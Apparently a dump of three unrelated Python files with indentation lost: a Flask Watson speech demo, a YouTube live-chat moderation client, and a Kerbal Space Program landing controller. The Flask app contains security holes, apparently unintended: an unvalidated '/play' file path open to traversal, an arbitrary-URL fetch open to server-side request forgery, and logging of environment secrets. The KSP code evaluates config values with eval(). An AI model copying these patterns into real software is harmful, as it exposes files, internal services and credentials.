for key in os.environ.keys():
print("\'%s\':\t\'%s\'" % (key, os.environ.get(key)))
# print_environment_variables()
# Audio formats supported by Speech to Text and Text to Speech
AUDIO_FORMATS = {
'audio/basic',
'audio/ogg',
'audio/mp3',
'audio/flac',
'audio/mpeg',
'audio/wav',
'audio/webm'
}
app = Flask(__name__)
port = os.getenv('PORT', '5030')
# Need these next two lines to eliminate the 'A secret key is required to use CSRF.' error
SECRET_KEY = os.urandom(32)
app.config['SECRET_KEY'] = SECRET_KEY
env_var = 'TTS_API_URL'
if env_var in os.environ:
TTS_API_URL = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_API_URL'
if env_var in os.environ:
STT_API_URL = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'TTS_API_KEY'
if env_var in os.environ:
TTS_API_KEY = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_API_KEY'
if env_var in os.environ:
STT_API_KEY = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_WS_URL'
if env_var in os.environ:
STT_WS_URL = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_HOST'
if env_var in os.environ:
STT_HOST = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_PORT'
if env_var in os.environ:
STT_PORT = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'URL_ROOT'
if env_var in os.environ:
url_root = os.environ[env_var]
else:
url_root = ''
AUDIO_FORMAT = 'audio/ogg'
# Call to IAM to get an access token to use with STT websocket API.
http_headers = {'Content-Type': 'application/json',
'Accept': 'application/json',
'X-Watson-Learning-Opt-Out': 'true',
'X-Watson-Metadata': 'customer_id=Fred'}
stt_auth = ('apikey', STT_API_KEY)
tts_auth = ('apikey', TTS_API_KEY)
iam_token_manager = IAMTokenManager(apikey=STT_API_KEY)
stt_access_token = iam_token_manager.get_token()
# Get the list of available TTS voices
result = requests.get(TTS_API_URL + '/v1/voices', auth=tts_auth, headers=http_headers)
if result.status_code != 200:
raise Exception('Error retrieving voices: %s - %s' % (result.status_code, result.content))
content = result.json()
voice_list = []
for voice in content['voices']:
voice_list.append({'name': voice['name'], 'description': voice['description']})
# Get the list of available STT language models
result = requests.get(STT_API_URL + '/v1/models', auth=stt_auth, headers=http_headers)
if result.status_code != 200:
raise Exception('Error retrieving models: %s - %s' % (result.status_code, result.content))
content = result.json()
model_list = []
for model in content['models']:
model_list.append({'name': model['name'], 'description': model['description']})
@app.before_request
def do_something_whenever_a_request_comes_in():
r = request
url = r.url
method = r.method
print('>>>> Call into Speech Test: %s ' % method, url)
print('Environ:\t%s' % request.environ)
print('Path:\t%s' % request.path)
print('Full_path:\t%s' % request.full_path)
print('Script_root:\t%s' % request.script_root)
print('Url:\t%s' % request.url)
print('Base_url:\t%s' % request.base_url)
print('Url_root:\t%s' % request.url_root)
print('Scheme:\t%s' % request.scheme)
@app.after_request
def apply_headers(response):
# These are to fix low severity vulnerabilities identified by AppScan
# in a dynamic scan. Also to prevent caching of content. Mostly to allow for rapid changing/debugging
# of style sheets.
response.headers['Content-Security-Policy'] = "object-src 'none'; script-src 'strict-dynamic'"
response.headers['X-Content-Type-Options'] = 'nosniff'
response.headers['X-XSS-Protection'] = '1; mode=block'
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Pragma"] = "no-cache"
response.headers["Expires"] = "0"
response.headers['Cache-Control'] = 'public, max-age=0'
return response
@app.errorhandler(Exception)
def handle_bad_request(e):
print('Error: %s' % str(e))
return render_template('blank.html', message=str(e))
@app.route('/')
def welcomeToMyapp():
return render_template('index.html')
@app.route('/favicon.ico')
def favicon():
return app.send_static_file('images/favicon-96x96.png')
@app.route('/build')
def build():
return app.send_static_file('build.txt')
@app.route('/voices')
def voices():
result = requests.get(TTS_API_URL + '/v1/voices', auth=tts_auth, headers=http_headers)
if result.status_code == 200:
voices = result.json()
return jsonify(voices)
else:
raise Exception(result.content)
@app.route('/tts', methods=['GET', 'POST'])
def tts():
return render_template('tts.html',
voice_list=voice_list,
voice="Lisa: American English female voice. Dnn technology.",
audio_format_list=AUDIO_FORMATS,
audio_file="static/audio/tts-lisa-intro.ogg",
audio_format="audio/ogg")
@app.route('/synthesize', methods=['GET', 'POST'])
def synthesize():
form = request.form
text = form['text_to_synthsize']
voice = form['voice']
audio_format = form['audio_format']
headers = {"Content-Type": "application/json", "accept": audio_format}
parameters = {'voice': voice}
payload = {"text": text}
response = requests.post(TTS_API_URL + '/v1/synthesize',
auth=tts_auth,
headers=headers,
params=parameters,
data=json.dumps(payload))
if response.status_code == 200:
sound_data = response.content
index = audio_format.find('/')
file_type = audio_format[index+1:len(audio_format)]
audio_filename = "static/audio/%s.%s" % (str(uuid.uuid1()), file_type)
f = open(audio_filename, 'wb')
f.write(sound_data)
f.close()
print('returning audio from %s' % audio_filename)
return render_template('tts.html',
voice_list=voice_list,
voice=voice,
audio_format_list=AUDIO_FORMATS,
audio_file=audio_filename,
audio_format=audio_format)
else:
message = "Error synthesizing \'%s\' with voice \'%s\'.\n<br>%s - %s" % (text,
voice,
response.status_code,
response.content)
return render_template('blank.html',
message=message)
@app.route('/play', defaults={'file_path': ''})
@app.route('/play/<path:file_path>')
def play(file_path):
BASE_DIR = './static/audio'
abs_path = os.path.join(BASE_DIR, file_path)
if not os.path.exists(abs_path):
return abort(404)
if os.path.isfile(abs_path):
return render_template('play.html',
audio_file=abs_path)
else:
files = os.listdir(abs_path)
return render_template('list_files.html', files=files)
@app.route('/models')
def models():
result = requests.get(STT_API_URL + '/v1/models', auth=stt_auth, headers=http_headers)
if result.status_code == 200:
models = result.json()
return jsonify(models)
else:
raise Exception(result.content)
@app.route('/stt', methods=['GET', 'POST'])
def stt():
m = model_list
return render_template('stt.html',
model_list=model_list,
audio_file="static/audio/stt-kate-intro.ogg",
audio_format="audio/ogg")
@app.route('/transcribe', methods=['GET', 'POST'])
def transcribe():
form = request.form
audio_url = form['url_to_transcribe']
model = form['model']
audio_metrics = form.get('audio_metrics', None)
if audio_metrics is None:
audio_metrics = False
else:
audio_metrics = True
processing_metrics = form.get('processing_metrics', None)
if processing_metrics is None:
processing_metrics = False
else:
processing_metrics = True
interim_results = form.get('interim_results', None)
if interim_results is None:
interim_results = False
else:
interim_results = True
result = requests.get(audio_url)
if result.status_code != 200:
raise Exception('Error %s retrieving audio file \'%s\'.' % (result.status_code, audio_url))
audio_content = result.content
recognize_url = "%s/v1/recognize?access_token=%s&model=%s" % (STT_WS_URL, stt_access_token, model)
# output and final_text are arrays used to get results back from the websocket callback routines below.
output = []
final_text = []
# started is set once the websocket interface is open and stt indicates that it is listening
started = threading.Event()
# completed is set once we see final=true in the transcription results
completed = threading.Event()
# on_message, on_open, on_close, on_error are for handling callbacks from websocket
def on_message(ws, message):
# this does the heavy lifting to process the transcription results. It looks for a 'final' flag
# in the transcription results and when found signals the completed event.
print("### message ###")
print(message)
json_message = json.loads(message)
# check first to see if STT flagged an error, which comes back in the message payload. if so, set the
# completed event to stop processing
error = json_message.get('error', None)
if error is not None:
output.append(json_message)
completed.set()
# Look for audio metrics and if found, add to output
results = json_message.get('audio_metrics', None)
if results is not None:
output.insert(0, json_message)
results = json_message.get('results', None)
# Look for transcription results and process
if results is not None:
output.append(json_message)
result = results[0]
final = result.get('final')
if final:
# If final is set we know we have the final transcription results, so record this
alternatives = result.get('alternatives')
if alternatives is not None and len(alternatives) > 0:
final_text.append(alternatives[0]['transcript'])
completed.set()
def on_error(ws, error):
print("### error ###")
print(error)
def on_close(ws):
print("### closed ###")
def on_open(ws):
print("### opened ###")
msg = {"action": "start",
"audio_metrics": audio_metrics,
"interim_results": interim_results,
"processing_metrics": processing_metrics}
ws.send(json.dumps(msg).encode('utf8'))
started.set()
def ws_thread(ws):
ws.run_forever()
# open the websocket and start a thread for processing
websocket.enableTrace(True)
ws = websocket.WebSocketApp(recognize_url, on_open=on_open, on_message=on_message, on_error=on_error,
on_close=on_close)
th = Thread(target=ws_thread, args=(ws,))
th.start()
# wait for the started event to indicate that STT is listening
started.wait(None)
ws.send(audio_content, opcode=websocket.ABNF.OPCODE_BINARY)
msg = {"action": "stop"}
ws.send(json.dumps(msg).encode('utf8'))
# Wait for the completed event, which is set once we see the final transcription results.
completed.wait(None)
ws.close()
if len(final_text) > 0:
text = final_text[0]
else:
text = ''
return render_template('stt.html',
final_text=text,
output=json.dumps(output, indent=4),
model_list=model_list,
audio_file=audio_url,
audio_title="%s - %s" % (model, audio_url))
if __name__ == '__main__':
print('Starting %s....' % sys.argv[0])
print('Python: ' + sys.version)
print("url_root: %s" % url_root)
app.run(host='0.0.0.0', port=int(port))
|
ytchat.py
|
import cgi
import json
import logging
import sys
import threading
import time
from datetime import datetime, timedelta
from json import dumps, loads
from pprint import pformat
import dateutil.parser
import httplib2
from oauth2client.file import Storage
import requests
PY3 = sys.version_info[0] == 3
if PY3:
from urllib.parse import urlencode
from queue import Queue
else:
from Queue import Queue
from urllib import urlencode
class YoutubeLiveChatError(Exception):
def __init__(self, message, code=None, errors=None):
Exception.__init__(self, message)
self.code = code
self.errors = errors
def _json_request(http, url, method='GET', headers=None, body=None):
resp, content = http.request(url, method, headers=headers, body=body)
content_type, content_type_params = cgi.parse_header(resp.get('content-type', 'application/json; charset=UTF-8'))
charset = content_type_params.get('charset', 'UTF-8')
data = loads(content.decode(charset))
if 'error' in data:
error = data['error']
raise YoutubeLiveChatError(error['message'], error.get('code'), error.get('errors'))
return resp, data
def get_datetime_from_string(datestr):
dt = dateutil.parser.parse(datestr)
return dt
def get_top_stream_chat_ids(credential_file):
playlist_id = "PLiCvVJzBupKmEehQ3hnNbbfBjLUyvGlqx"
storage = Storage(credential_file)
credentials = storage.get()
http = credentials.authorize(httplib2.Http())
url = "https://www.googleapis.com/youtube/v3/playlistItems?"
params = {'part': 'contentDetails','playlistId':playlist_id}
params = urlencode(params)
resp, data = _json_request(http, url + params)
chatids = []
for item in data['items']:
videoid = item['contentDetails']['videoId']
url = "https://www.googleapis.com/youtube/v3/videos?"
params = {'part': 'liveStreamingDetails','id': videoid}
params = urlencode(params)
response_obj, video_data = _json_request(http, url + params)
chatId = video_data['items'][0]['liveStreamingDetails']['activeLiveChatId']
chatids.append(chatId)
return chatids
def get_live_chat_id_for_stream_now(credential_file):
storage = Storage(credential_file)
credentials = storage.get()
http = credentials.authorize(httplib2.Http())
url = "https://www.googleapis.com/youtube/v3/liveBroadcasts?"
params = {'part': 'snippet', 'mine': 'true'}
params = urlencode(params)
resp, data = _json_request(http, url + params)
return data['items'][0]['snippet']['liveChatId']
def get_livechat_id(api_key, live_stream_id):
url = f'https://www.googleapis.com/youtube/v3/videos?part=liveStreamingDetails&key={api_key}&id={live_stream_id}'
res = requests.get(url)
data = json.loads(res.text)['items'][0]['liveStreamingDetails']['activeLiveChatId']
return data
def get_live_chat_id_for_broadcast_id(broadcastId, credential_file):
storage = Storage(credential_file)
credentials = storage.get()
http = credentials.authorize(httplib2.Http())
url = "https://www.googleapis.com/youtube/v3/liveBroadcasts?"
#url = 'https://www.googleapis.com/youtube/v3/videos'
params = {'part': 'snippet', 'id': broadcastId}
params = urlencode(params)
resp, data = _json_request(http, url + params)
return data['items']#[0]['snippet']['liveChatId']
def channelid_to_name(channelId, http):
url = "https://www.googleapis.com/youtube/v3/channels?part=snippet&id={0}".format(channelId)
response, data = _json_request(http, url)
return data['items'][0]['snippet']['title']
class MessageAuthor(object):
def __init__(self, json):
self.is_verified = json['isVerified']
self.channel_url = json['channelUrl']
self.profile_image_url = json['profileImageUrl']
self.channel_id = json['channelId']
self.display_name = json['displayName']
self.is_chat_owner = json['isChatOwner']
self.is_chat_sponsor = json['isChatSponsor']
self.is_chat_moderator = json['isChatModerator']
class LiveChatMessage(object):
def __init__(self, http, json):
self.http = http
self.json = json
self.etag = json['etag']
self.id = json['id']
snippet = json['snippet']
self.type = snippet['type']
self.message_text = snippet['textMessageDetails']['messageText']
self.display_message = snippet['displayMessage']
self.has_display_content = snippet['hasDisplayContent']
self.live_chat_id = snippet['liveChatId']
self.published_at = get_datetime_from_string(snippet['publishedAt'])
self.author = MessageAuthor(json['authorDetails'])
def delete(self):
url = "https://www.googleapis.com/youtube/v3/liveChat/messages"
url = url + '?id={0}'.format(self.id)
resp, content = self.http.request(url, 'DELETE')
def permaban(self):
url = "https://www.googleapis.com/youtube/v3/liveChat/bans"
message = {u'snippet': {u'liveChatId': self.live_chat_id, u'type': 'permanent', "bannedUserDetails": {"channelId": self.author.channel_id}}}
jsondump = dumps(message)
url = url + '?part=snippet'
resp, data = _json_request(self.http,
url,
'POST',
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=jsondump)
jsonresponse = dumps(data)
return data['id']
def tempban(self, timee = 300):
url = "https://www.googleapis.com/youtube/v3/liveChat/bans"
message = {u'snippet': {u'liveChatId': self.live_chat_id, u'type': 'temporary', "banDurationSeconds": timee, "bannedUserDetails": {"channelId": self.author.channel_id}}}
jsondump = dumps(message)
url = url + '?part=snippet'
resp, data = _json_request(self.http,
url,
'POST',
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=jsondump)
def unban(self, id):
url = "https://www.googleapis.com/youtube/v3/liveChat/bans"
url = url + '?id=' + id
content = self.http.request(url, 'DELETE')
def __repr__(self):
if PY3:
return self.display_message
else:
return self.display_message.encode("UTF-8")
class LiveChatModerator(object):
def __init__(self, http, json):
self.http = http
self.json = json
self.etag = json['etag']
self.id = json['id']
snippet = json['snippet']
self.channel_id = snippet['moderatorDetails']['channelId']
self.channel_url = snippet['moderatorDetails']['channelUrl']
self.display_name = snippet['moderatorDetails']['displayName']
self.profile_image_url = snippet['moderatorDetails']['profileImageUrl']
def delete(self):
url = "https://www.googleapis.com/youtube/v3/liveChat/moderators"
url = url + '?id={0}'.format(self.id)
resp, content = self.http.request(url, 'DELETE')
def __repr__(self):
if PY3:
return self.display_name
else:
return self.display_name.encode("UTF-8")
class YoutubeLiveChat(object):
def __init__(self, credential_filename, livechatIds):
self.logger = logging.getLogger(name="YoutubeLiveChat")
self.chat_subscribers = []
self.thread = threading.Thread(target=self.run)
self.livechatIds = {}
self.message_queue = Queue()
storage = Storage(credential_filename)
credentials = storage.get()
self.http = credentials.authorize(httplib2.Http())
self.livechat_api = LiveChatApi(self.http)
for chat_id in livechatIds:
self.livechatIds[chat_id] = {'nextPoll': datetime.now(), 'msg_ids': set(), 'pageToken': None}
result = self.livechat_api.live_chat_messages_list(chat_id)
while result['items']:
pollingIntervalMillis = result['pollingIntervalMillis']
self.livechatIds[chat_id]['msg_ids'].update(msg['id'] for msg in result['items'])
self.livechatIds[chat_id]['nextPoll'] = datetime.now() + timedelta(seconds=pollingIntervalMillis / 1000)
if result['pageInfo']['totalResults'] > result['pageInfo']['resultsPerPage']:
self.livechatIds[chat_id]['pageToken'] = result['nextPageToken']
time.sleep(result['pollingIntervalMillis'] / 1000)
result = self.livechat_api.live_chat_messages_list(chat_id,
pageToken=self.livechatIds[chat_id]['pageToken'])
else:
break
self.logger.debug("Initalized")
def start(self):
self.running = True
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def join(self):
self.thread.join()
def stop(self):
self.running = False
if self.thread.is_alive():
self.thread.join()
def run(self):
while self.running:
# send a queued messages
if not self.message_queue.empty():
to_send = self.message_queue.get()
self._send_message(to_send[0], to_send[1])
# check for messages
for chat_id in self.livechatIds:
if self.livechatIds[chat_id]['nextPoll'] < datetime.now():
msgcache = self.livechatIds[chat_id]['msg_ids']
result = None
try:
result = self.livechat_api.live_chat_messages_list(
chat_id,
pageToken=self.livechatIds[chat_id]['pageToken'])
except Exception as e:
self.logger.warning(e)
self.logger.warning("Exception while trying to get yt api")
if result:
if 'pollingIntervalMillis' not in result:
self.logger.warning("Empty result")
self.logger.warning(pformat(result))
continue
pollingIntervalMillis = result['pollingIntervalMillis']
while result['items']:
latest_messages = {msg['id'] for msg in result['items']}
if msgcache:
new_messages = latest_messages.difference(msgcache)
else:
new_messages = latest_messages
new_msg_objs = [LiveChatMessage(self.http, json)
for json in result['items'] if json['id'] in new_messages]
self.livechatIds[chat_id]['msg_ids'].update(new_messages)
nextPoll = datetime.now() + timedelta(seconds=pollingIntervalMillis / 1000)
self.livechatIds[chat_id]['nextPoll'] = nextPoll
if new_msg_objs:
self.logger.debug("New chat messages")
self.logger.debug(new_msg_objs)
for callback in self.chat_subscribers:
try:
callback(new_msg_objs, chat_id)
except:
msg = "Exception during callback to {0}".format(callback)
self.logger.exception(msg)
if result['pageInfo']['totalResults'] > result['pageInfo']['resultsPerPage']:
self.livechatIds[chat_id]['pageToken'] = result['nextPageToken']
time.sleep(result['pollingIntervalMillis'] / 1000)
result = self.livechat_api.live_chat_messages_list(
chat_id,
pageToken=self.livechatIds[chat_id]['pageToken'])
else:
break
time.sleep(1)
def get_moderators(self, livechatId):
result = self.livechat_api.live_chat_moderators_list(livechatId)
if result['items']:
mods = result['items']
if result['pageInfo']['totalResults'] > result['pageInfo']['resultsPerPage']:
while result['items']:
result = self.livechat_api.live_chat_moderators_list(livechatId, pageToken=result['nextPageToken'])
if result['items']:
mods.extend(result['items'])
else:
break
if 'nextPageToken' not in result:
break
moderator_objs = [LiveChatModerator(self.http, json) for json in mods]
return moderator_objs
def set_moderator(self, livechatId, moderator_channelid):
message = {u'snippet': {u'liveChatId': livechatId, "moderatorDetails": {"channelId": moderator_channelid}}}
jsondump = dumps(message)
return self.livechat_api.live_chat_moderators_insert(jsondump)
def send_message(self, text, livechatId):
self.message_queue.put((text, livechatId))
def _send_message(self, text, livechatId):
message = {
u'snippet': {
u'liveChatId': livechatId,
"textMessageDetails": {
"messageText": text
},
"type": "textMessageEvent"
}
}
jsondump = dumps(message)
response = self.livechat_api.live_chat_messages_insert(jsondump)
self.logger.debug(pformat(response))
self.livechatIds[livechatId]['msg_ids'].add(response['id'])
def subscribe_chat_message(self, callback):
self.chat_subscribers.append(callback)
class LiveChatApi(object):
def __init__(self, http):
self.http = http
self.logger = logging.getLogger("liveChat_api")
def get_all_messages(self, livechatId):
data = self.LiveChatMessages_list(livechatId, maxResults=2000)
total_items = data['pageInfo']['totalResults']
pageToken = data['nextPageToken']
if len(data['items']) < total_items:
time.sleep(data['pollingIntervalMillis'] / 1000)
while len(data['items']) < total_items:
other_data = self.LiveChatMessages_list(livechatId, maxResults=2000, pageToken=pageToken)
if not other_data['items']:
break
else:
data['items'].extend(other_data['items'])
pageToken = other_data['nextPageToken']
time.sleep(other_data['pollingIntervalMillis'] / 1000)
return data
def live_chat_moderators_list(self, livechatId, part='snippet', maxResults=5, pageToken=None):
url = 'https://www.googleapis.com/youtube/v3/liveChat/moderators'
url = url + '?liveChatId={0}'.format(livechatId)
if pageToken:
url = url + '&pageToken={0}'.format(pageToken)
url = url + '&part={0}'.format(part)
url = url + '&maxResults={0}'.format(maxResults)
resp, data = _json_request(self.http, url)
resp, content = self.http.request(url, 'GET')
data = loads(content.decode("UTF-8"))
return data
def live_chat_moderators_insert(self, liveChatId, liveChatModerator):
url = 'https://www.googleapis.com/youtube/v3/liveChat/messages'
url = url + '?part=snippet'
resp, data = _json_request(self.http,
url,
'POST',
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=liveChatModerator)
return data
def live_chat_messages_list(self,
livechatId,
part='snippet,authorDetails',
maxResults=200,
pageToken=None,
profileImageSize=None):
url = 'https://www.googleapis.com/youtube/v3/liveChat/messages'
url = url + '?liveChatId={0}'.format(livechatId)
if pageToken:
url = url + '&pageToken={0}'.format(pageToken)
if profileImageSize:
url = url + '&profileImageSize={0}'.format(profileImageSize)
url = url + '&part={0}'.format(part)
url = url + '&maxResults={0}'.format(maxResults)
resp, data = _json_request(self.http, url)
return data
def live_chat_messages_insert(self, liveChatMessage):
url = 'https://www.googleapis.com/youtube/v3/liveChat/messages'
url = url + '?part=snippet'
resp, data = _json_request(self.http,
url,
'POST',
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=liveChatMessage)
self.logger.debug(pformat(resp))
return data
def live_chat_message_delete(self, idstring):
"DELETE https://www.googleapis.com/youtube/v3/liveChat/messages"
|
KSP_controller.py
|
import krpc
import time
import math
import numpy as np
import numpy.linalg as npl
import SC_solver as solver
import SC_params
from KSP_controller_utils import *
from threading import Thread
print('--------')
params = {}
with open('KSP_controller_params.txt', 'r', encoding='utf-8') as f:
for line in f:
pair = line.split('#')[0].split('=')
if len(pair) == 2:
key = pair[0].strip()
value = eval(pair[1])
params[key] = value
print('----------params------------')
for k in (params):
print(' %s: \n%s' % (k, params[k]))
print('\n\ninitializing...')
deg2rad = math.pi / 180
rad2deg = 180 / math.pi
g0 = params['g0']
#连接krpc
print('connecting...')
conn = krpc.connect(name='SC_controller')
space_center = conn.space_center
vessel = space_center.active_vessel
flight = vessel.flight()
body = vessel.orbit.body
engine_gimbal = [m for m in vessel.parts.with_name('SSME')[0].modules if m.name == 'ModuleGimbal'][0]
# StarShip Main Engine(大雾)
engine_y = vessel.parts.with_name('SSME')[0].position(vessel.reference_frame)[1]
# starship flap
get_hinge = lambda tagname:[m for m in vessel.parts.with_tag(tagname)[0].modules if m.name=='ModuleRoboticServoHinge'][0]
h_fl = get_hinge('h_f_l')
h_fr = get_hinge('h_f_r')
h_rl = get_hinge('h_r_l')
h_rr = get_hinge('h_r_r')
#set 'Target Angle' 0~180
set_deploy = lambda h, deploy: h.set_field_float('Target Angle', math.asin(clamp(deploy, 0, 1)) * rad2deg + 5)
set_retract = lambda h:h.set_field_float('Target Angle', 0)
set_deploy(h_fl, 1)
set_deploy(h_fr, 1)
set_deploy(h_rl, 1)
set_deploy(h_rr, 1)
def combine_flaps(pitch_up, spin_right):
pitch_up = clamp(pitch_up, -1, 1)
#roll_right = clamp(roll_right, -1, 1)
spin_right = clamp(spin_right, -1, 1)
ctrl_fl = pitch_up
ctrl_fr = pitch_up
ctrl_rl = -pitch_up
ctrl_rr = -pitch_up
gap = max(0, 0.95 - max(ctrl_fl, ctrl_fr, ctrl_rl, ctrl_rr))
ctrl_fl += gap
ctrl_fr += gap
ctrl_rl += gap
ctrl_rr += gap
ctrl_fl += -spin_right * 0.4
ctrl_fr += spin_right * 0.4
ctrl_rl += spin_right * 0.28
ctrl_rr += -spin_right * 0.28
set_deploy(h_fl, (ctrl_fl) / 2. + 0.5)
set_deploy(h_fr, (ctrl_fr) / 2. + 0.5)
set_deploy(h_rl, (ctrl_rl) / 2. + 0.5)
set_deploy(h_rr, (ctrl_rr) / 2. + 0.5)
def retract_flaps():
(h_fl).set_field_float('Target Angle', 5)
(h_fr).set_field_float('Target Angle', 5)
(h_rl).set_field_float('Target Angle', 5)
(h_rr).set_field_float('Target Angle', 5)
#gimbal
#hinge_x = [m for m in vessel.parts.with_tag('hx')[0].modules if m.name=='ModuleRoboticServoHinge'][0]
#hinge_z = [m for m in vessel.parts.with_tag('hz')[0].modules if m.name=='ModuleRoboticServoHinge'][0]
#hinge_offset_y = hinge_x.part.position(vessel.reference_frame)[1]
#gimbalX = lambda angle:hinge_x.set_field_float('Target Angle', angle)
#gimbalY = lambda angle:hinge_z.set_field_float('Target Angle', angle)
#print(hinge_x.fields)
#www
delta_time = 0.01
#target
target_lat = params['target_lat'] * deg2rad
target_lon = params['target_lon'] * deg2rad
target_height = params['target_height']
target_axis = target_height + body.surface_height(target_lat * rad2deg, target_lon * rad2deg) + body.equatorial_radius
target_body_pos = np.array((math.cos(target_lon) * math.cos(target_lat), math.sin(target_lat), math.sin(target_lon) * math.cos(target_lat))) * target_axis
#limit
throttle_limit = params['throttle_limit']
throttle_limit_ctrl = params['throttle_limit_ctrl']
max_tilt = np.deg2rad(params['max_tilt'])
max_tilt_off = np.deg2rad(params['max_tilt_off'])
# krpc vessel对象生成vesselprofile
def get_vessel_profile(vessel):
p = SC_params.VesselProfile()
p.isp = vessel.specific_impulse
p.g = vec(-g0, 0., 0.) # gravity
p.m_dry = vessel.dry_mass
p.gamma_gs = np.deg2rad(params['gamma_gs']) # glide slope
p.theta_max = np.linspace(np.deg2rad(params['max_tilt']), np.deg2rad(10), SC_params.SuperParams().K) # tilt
p.omega_max = np.deg2rad(params['max_omega']) # rotation vel
p.delta_max = np.deg2rad(params['max_delta']) # gimbal
p.T_min = vessel.available_thrust * throttle_limit[0]
p.T_max = vessel.available_thrust * throttle_limit[1]
p.r_T_B = vec(engine_y, 0., 0.) # thrust offset
p.J_B_I = np.array(vessel.inertia_tensor).reshape((3, 3))
p.airfric_k = params['airfric_k']
p.time_guess = params['tf_guess']
return p
# 根据krpc vessel对象预测落到给定高度时的vesselstate
def predict_vessel_state(vessel, est_height):
# ref_target flight
vel = vec(vessel.velocity(ref_target))
pos = vec(vessel.position(ref_target))
est_t = (pos[0] - est_height) / (-vel[0]) #匀速
est_pos = pos + est_t * vel
hdg_right = (flight.heading + 90) * deg2rad #右侧指向
rot_axis = v3(0, math.cos(hdg_right), math.sin(hdg_right))
rot_quat = quat(rot_axis, 90 * deg2rad)
#qx, qy, qz, qw = vessel.rotation(ref_target) #xyzw转wxyz
qx, qy, qz, qw = rot_quat #xyzw转wxyz
state = SC_params.VesselState()
state.mass = vessel.mass
state.pos = est_pos
state.vel = vel
state.rotation = vec(qw, qx, qy, qz)
#state.rotation = vec(1, 0, 0, 0)
state.omega = vec(0, 0, 0)
return state
def get_final_state(vessel, final_height):
optimal_acc = vessel.available_thrust / vessel.mass * params['final_throttle'] - g0
final_vel = math.sqrt(2 * optimal_acc * final_height)
state = SC_params.VesselState()
state.mass = vessel.mass
state.pos = vec(final_height, 0, 0)
state.vel = vec(-final_vel, 0, 0)
state.rotation = vec(1, 0, 0, 0)
state.omega = vec(0, 0, 0)
return state
#fall attitude
ctrl_fall_pitch = PID()
ctrl_fall_pitch.kp = params['ctrl_fall_pitch.kp']
ctrl_fall_pitch.kd = params['ctrl_fall_pitch.kd']
#ctrl_fall_pitch.ki = params['ctrl_fall_pitch.ki'] # set that later
ctrl_fall_pitch.integral_limit = params['ctrl_fall_pitch.integral_limit']
ctrl_fall_yaw = PID()
ctrl_fall_yaw.kp = params['ctrl_fall_yaw.kp']
ctrl_fall_yaw.kd = params['ctrl_fall_yaw.kd']
ctrl_fall_distance = PID()
ctrl_fall_distance.kp = params['ctrl_fall_distance.kp']
ctrl_fall_distance.kd = params['ctrl_fall_distance.kd']
#rotation
ctrl_x_rot = PID()
ctrl_x_rot.kp = params['ctrl_x_rot.kp']
ctrl_x_rot.kd = params['ctrl_x_rot.kd']
#ctrl_x_rot.redundancy = 0.1
ctrl_y_avel_kp = params['ctrl_y_avel_kp']
ctrl_z_rot = PID()
ctrl_z_rot.kp = params['ctrl_z_rot.kp']
ctrl_z_rot.kd = params['ctrl_z_rot.kd']
#ctrl_z_rot.redundancy = 0.1
#测量值
#torque = v3(3.66e+04, 5000, 3.66e+04)
#torque_k = v3(8.2e+04-3.66e+04, 0, 8.2e+04-3.66e+04)
#torque = v3(10300.000011920929, 10300.000011920929, 10300.000011920929)
#torque_k = v3(15183.20083618, 10772.2761631, 15183.24184418)
#print(vessel.available_torque)
# k
k_x = params['k_x']
k_v = params['k_v']
# final
final_throttle = params['final_throttle']
final_kp = params['final_kp']
# time init
game_delta_time = 0.02
game_prev_time = space_center.ut
start_time = time.time()
# references
print('creating target frame...')
ref_local = vessel.reference_frame
ref_surface = vessel.surface_reference_frame #地面参考系
ref_body = body.reference_frame
ref_target_temp = space_center.ReferenceFrame.create_relative(ref_body, position=target_body_pos)
ref_target = space_center.ReferenceFrame.create_hybrid(ref_target_temp, rotation=ref_surface, velocity=ref_target_temp)
prev_vel = vec(vessel.velocity(ref_surface))
K = SC_params.SuperParams().K
solved_path = None
n_i = -1
error = vec(vessel.position(ref_target))
print('current error: %s' % error)
debug_lines = params['debug_lines']
if debug_lines:
print('debug lines...')
lines = [conn.drawing.add_line((0,0,0),(0,0,0), ref_target) for i in range(K-1)]
directions = [conn.drawing.add_line((0,0,0), (1,0,0), ref_target) for i in range(K)]
thrustvecs = [conn.drawing.add_line((0,0,0), (1,0,0), ref_target) for i in range(K)]
target_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target)
target_line.color = (0,0,1)
target2_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target)
target2_line.color = (0,0,1)
head_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target)
head_line.color = (0,1,1)
for line in directions:
line.color = (1,0,0)
for line in thrustvecs:
line.color = (1,0,1)
nav_mode = 'none'
frcount = 0
def update_lines(x, u):
print('debug lines...')
m_u = vessel.available_thrust
for i in range(K-1):
lines[i].start = x[1:4, i]
lines[i].end = x[1:4, i+1]
for i in range(K):
mat = rotation_mat(x[7:11, i])
directions[i].start = x[1:4, i]
directions[i].end = x[1:4, i] + transform(vec(1, 0, 0), mat) * 5
thrustvecs[i].start = x[1:4, i]
thrustvecs[i].end = x[1:4, i] - transform(u[:, i], mat) / m_u * 10
def find_nearest_index(rk, vk, error):
nearest_mag = npl.norm(rk[:, 0] - error)
nearest_i = 0
for i in range(x.shape[1]):
mag = npl.norm(rk[:, i] - error) # + npl.norm(x[3:6, i] - v) * 0.2
if mag < nearest_mag:
nearest_mag = mag
nearest_i = i
v = vk[:, nearest_i]
v_norm = npl.norm(v)
v_dir = v / v_norm
frac = clamp(np.dot(error - rk[:, nearest_i], v_dir) / (tf / K * v_norm), 0.5, -0.5)
return nearest_i + frac
def sample_index(index, rk, vk, qk, uk):
#if index >= N-1:
if index >= K-1:
return (rk[:, K-1], vk[:, K-1], qk[:, K-1], uk[:, K-1])
